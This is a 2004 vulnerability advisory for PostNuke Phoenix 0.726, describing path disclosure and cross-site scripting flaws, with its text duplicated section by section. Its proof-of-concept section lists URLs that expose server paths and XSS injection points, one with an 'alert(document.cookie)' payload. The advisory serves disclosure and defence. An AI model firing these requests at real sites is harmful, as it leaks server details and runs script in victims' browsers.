PostNuke Phoenix Multiple Cross-Site Scripting And Path Disclosure Vulnerabilities
BID:10191
Info
PostNuke Phoenix Multiple Cross-Site Scripting And Path Disclosure Vulnerabilities
| Bugtraq ID: | 10191 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 21 2004 12:00AM |
| Updated: | Apr 21 2004 12:00AM |
| Credit: | Discovery of these vulnerabilities has been credited to Janek Vind <[email protected]>. |
| Vulnerable: |
PostNuke Development Team PostNuke Phoenix 0.726 |
| Not Vulnerable: | |
Discussion
PostNuke Phoenix Multiple Cross-Site Scripting And Path Disclosure Vulnerabilities
Multiple vulnerabilities were reported to exist in PostNuke Phoenix. The following specific vulnerabilities were reported:
- Multiple path disclosure vulnerabilities that occur when a user directly requests scripts in the "/includes/blocks/" and "pnadodb" directories. This issue also affects scripts that are associated in multiple modules.
- Multiple cross-site scripting vulnerabilities were reported in the Downloads and Web_Links modules as well as the openwindow.php script. These issues may permit remote attackers to cause hostile HTML and script code to be interpreted by a victim user's browser.
Multiple vulnerabilities were reported to exist in PostNuke Phoenix. The following specific vulnerabilities were reported:
- Multiple path disclosure vulnerabilities that occur when a user directly requests scripts in the "/includes/blocks/" and "pnadodb" directories. This issue also affects scripts that are associated in multiple modules.
- Multiple cross-site scripting vulnerabilities were reported in the Downloads and Web_Links modules as well as the openwindow.php script. These issues may permit remote attackers to cause hostile HTML and script code to be interpreted by a victim user's browser.
Exploit / POC
PostNuke Phoenix Multiple Cross-Site Scripting And Path Disclosure Vulnerabilities
The following examples have been supplied:
Path disclosure:
http://www.example.com/postnuke0726/includes/blocks/finclude.php
http://www.example.com/postnuke0726/pnadodb/drivers/adodb-access.inc.php
http://www.example.com/postnuke0726/modules/NS-NewUser/user.php
http://www.example.com/postnuke0726/modules/NS-Your_Account/user/links/links.changehome.php
http://www.example.com/postnuke0726/modules/NS-Your_Account/user/case/case.changehome.php?op=edithome
http://www.example.com/postnuke0726/modules/NS-LostPassword/user.php
http://www.example.com/postnuke0726/modules/NS-Multisites/chgtheme.inc.php
http://www.example.com/postnuke0726/modules/NS-Multisites/head.inc.php
http://www.example.com/postnuke0726/modules/NS-Multisites/print.inc.php
http://www.example.com/postnuke0726/modules/NS-User/tools.php
http://www.example.com/postnuke0726/modules/NS-User/user.php
Cross-Site Scripting:
http://www.example.com/postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=ratedownload&ttitle=x&lid=>[xss code here]
http://www.example.com/postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=search&query=>[xss code here]
http://www.example.com/postnuke0726/modules.php?op=modload&name=Web_Links&file=index&req=search&query=>[xss code here]
http://www.example.com/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body>[xss code here]
http://www.example.com/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body%20onload=alert(document.cookie);>
The following examples have been supplied:
Path disclosure:
http://www.example.com/postnuke0726/includes/blocks/finclude.php
http://www.example.com/postnuke0726/pnadodb/drivers/adodb-access.inc.php
http://www.example.com/postnuke0726/modules/NS-NewUser/user.php
http://www.example.com/postnuke0726/modules/NS-Your_Account/user/links/links.changehome.php
http://www.example.com/postnuke0726/modules/NS-Your_Account/user/case/case.changehome.php?op=edithome
http://www.example.com/postnuke0726/modules/NS-LostPassword/user.php
http://www.example.com/postnuke0726/modules/NS-Multisites/chgtheme.inc.php
http://www.example.com/postnuke0726/modules/NS-Multisites/head.inc.php
http://www.example.com/postnuke0726/modules/NS-Multisites/print.inc.php
http://www.example.com/postnuke0726/modules/NS-User/tools.php
http://www.example.com/postnuke0726/modules/NS-User/user.php
Cross-Site Scripting:
http://www.example.com/postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=ratedownload&ttitle=x&lid=>[xss code here]
http://www.example.com/postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=search&query=>[xss code here]
http://www.example.com/postnuke0726/modules.php?op=modload&name=Web_Links&file=index&req=search&query=>[xss code here]
http://www.example.com/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body>[xss code here]
http://www.example.com/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body%20onload=alert(document.cookie);>
Solution / Fix
PostNuke Phoenix Multiple Cross-Site Scripting And Path Disclosure Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
PostNuke Phoenix Multiple Cross-Site Scripting And Path Disclosure Vulnerabilities
References:
References:
- PostNuke Homepage (PostNuke Development Team)
- [waraxe-2004-SA#022 - Multiple vulnerabilities in PostNuke 0.726 Phoenix - part (Janek Vind
)